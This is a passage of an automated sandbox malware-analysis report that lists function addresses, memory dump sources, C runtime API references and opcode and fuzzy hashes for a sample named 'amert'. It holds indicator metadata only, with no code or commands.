                                                                                                                                                                                                                                        Function 04FC04A2 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c7cf3d865f538e2b908810f62b11ace6ffdb1d2acc9fc8d31a5078d620531c9a
                                                                                                                                                                                                                                        • Instruction ID: e46ea15735cabda5a81f25092263031306c8d035b18dedd9d459b6ab21359681
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7cf3d865f538e2b908810f62b11ace6ffdb1d2acc9fc8d31a5078d620531c9a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42E09AAF288022AC7051D1C63B64AFB966DE2E1630770C82BF842D1507AA85A65F7071
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                        Function 0037CD47 Relevance: .2, Instructions: 172COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 0036239E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___std_exception_copy
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2659868963-0
                                                                                                                                                                                                                                        • Opcode ID: 9b03b68fec3259f2a7b9fc8e0b9cf5c42763d082fcdc6fa81a08c5b3cfc11cab
                                                                                                                                                                                                                                        • Instruction ID: f8dfec2930844014782c3c067d2dedeecacd94a1ce86f776b21d9068099277a8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b03b68fec3259f2a7b9fc8e0b9cf5c42763d082fcdc6fa81a08c5b3cfc11cab
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5519E719112159FDB2ACF59D891BAABBF8FF48310F25C46AD40DEB291D378E940CB50
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00362DA0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 57040152-0
                                                                                                                                                                                                                                        • Opcode ID: a4794c67f673ad93710859e23f9c4bea59c7aaa9eebd0b11e93f3f116bc2e63a
                                                                                                                                                                                                                                        • Instruction ID: b6983df4160795bedb278a1d86a437680be5ca5b9efaf15ec43f6c174b9c05cc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4794c67f673ad93710859e23f9c4bea59c7aaa9eebd0b11e93f3f116bc2e63a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8A1C0B0A006059FDB22DB64C944B5BB7F8FF15314F06C529E81ADB245EB35EA04CBD1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00396AC6 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _wcsrchr
                                                                                                                                                                                                                                        • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                        • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                        • Opcode ID: 60735a2b3d8a19b5ec3263d80d63aa1a12afb499e45a73ee7e50ca8e822f7c96
                                                                                                                                                                                                                                        • Instruction ID: 7f31ef87cea61506587319932342397c92d2757d63e4d1669d3a160bcf252d9c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60735a2b3d8a19b5ec3263d80d63aa1a12afb499e45a73ee7e50ca8e822f7c96
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D101D63BA15621266F17211AAC23BFB57988B86BB4727002EFD44FB5C1FF55DC0241A4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00362590 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00362726
                                                                                                                                                                                                                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 003627C0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___std_exception_copy___std_exception_destroy
                                                                                                                                                                                                                                        • String ID: p"6$p"6
                                                                                                                                                                                                                                        • API String ID: 2970364248-111699406
                                                                                                                                                                                                                                        • Opcode ID: a48cce0cbcb4e206330b353420fc96cd15deeab3f7570225171cf6521a1c716a
                                                                                                                                                                                                                                        • Instruction ID: a9cbba3618aa7511946a48d0ddcffbd3c27212a4bc2ede41de5bfd1f4f21f9ba
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a48cce0cbcb4e206330b353420fc96cd15deeab3f7570225171cf6521a1c716a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92719071E102089FDF16CFA8C881BDEFBB4EF59310F14812DE805AB285D774A944CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00377360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0037744C
                                                                                                                                                                                                                                        • __Cnd_destroy_in_situ.LIBCPMT ref: 00377458
                                                                                                                                                                                                                                        • __Mtx_destroy_in_situ.LIBCPMT ref: 00377461
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                                                                                                                                                                                                        • String ID: 0t7
                                                                                                                                                                                                                                        • API String ID: 4078500453-683943295
                                                                                                                                                                                                                                        • Opcode ID: 16106e7938e6eeb2ed7cbb4f357decdfa45c44620c9d58214a70eedf45d85ffb
                                                                                                                                                                                                                                        • Instruction ID: 831340dc768d876c23070ec79f4d876c60a7a68df41c91cf080a17f06b56b4c8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16106e7938e6eeb2ed7cbb4f357decdfa45c44620c9d58214a70eedf45d85ffb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5531E5B1A047049BE732DF68D841A5AF7E8EF04350F108A3EE949CB641E779EA54C7E1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 003629F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00362A43
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___std_exception_copy
                                                                                                                                                                                                                                        • String ID: This function cannot be called on a default constructed task$p"6$p"6
                                                                                                                                                                                                                                        • API String ID: 2659868963-5733453
                                                                                                                                                                                                                                        • Opcode ID: 4b269452639302417e2cbafe3f60410eb3adc190d2d01bd25546461fa0a149b6
                                                                                                                                                                                                                                        • Instruction ID: 8a16a7f56d14d1fe147087a9664517a479620a8dbd229c771980608d94cd1686
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b269452639302417e2cbafe3f60410eb3adc190d2d01bd25546461fa0a149b6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45F0F670D1030C9BC712DFA8D8419DEFBECDF56304F1086ADF8549B601EB70AA548794
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00379370 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 003793AF
                                                                                                                                                                                                                                        • __Cnd_destroy_in_situ.LIBCPMT ref: 003793BB
                                                                                                                                                                                                                                        • __Mtx_destroy_in_situ.LIBCPMT ref: 003793C4
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                                                                                                                                                                                                        • String ID: 0t7
                                                                                                                                                                                                                                        • API String ID: 4078500453-683943295
                                                                                                                                                                                                                                        • Opcode ID: 042fa3691f3afc0f9cdefc13332f77762830022b51d9104f5c3c85b31631ca75
                                                                                                                                                                                                                                        • Instruction ID: 8933d4feafff16defba2d22918e2985c1f1dbe8aa473b171ee0ee26e020c028c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 042fa3691f3afc0f9cdefc13332f77762830022b51d9104f5c3c85b31631ca75
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13F04FB6900B009BDA35DB64E449B9BB3ECAF44301F05891EE69ACB940D778E588CB51
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0039C2B1 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                                                                                                                        • Opcode ID: c2189248270ea340cbd842f54171ce7f18cb959cd5409b5c13150a41ec3c7c18
                                                                                                                                                                                                                                        • Instruction ID: dba7e7ae29b56b5875272a01415a455ab1b0bd0a9f37e8246889249125046092
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2189248270ea340cbd842f54171ce7f18cb959cd5409b5c13150a41ec3c7c18
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4FB14832A242859FDF13CF29C8917BEBBF5EF56340F16916AE8459B342D6389D01CB60
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0037B4D2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
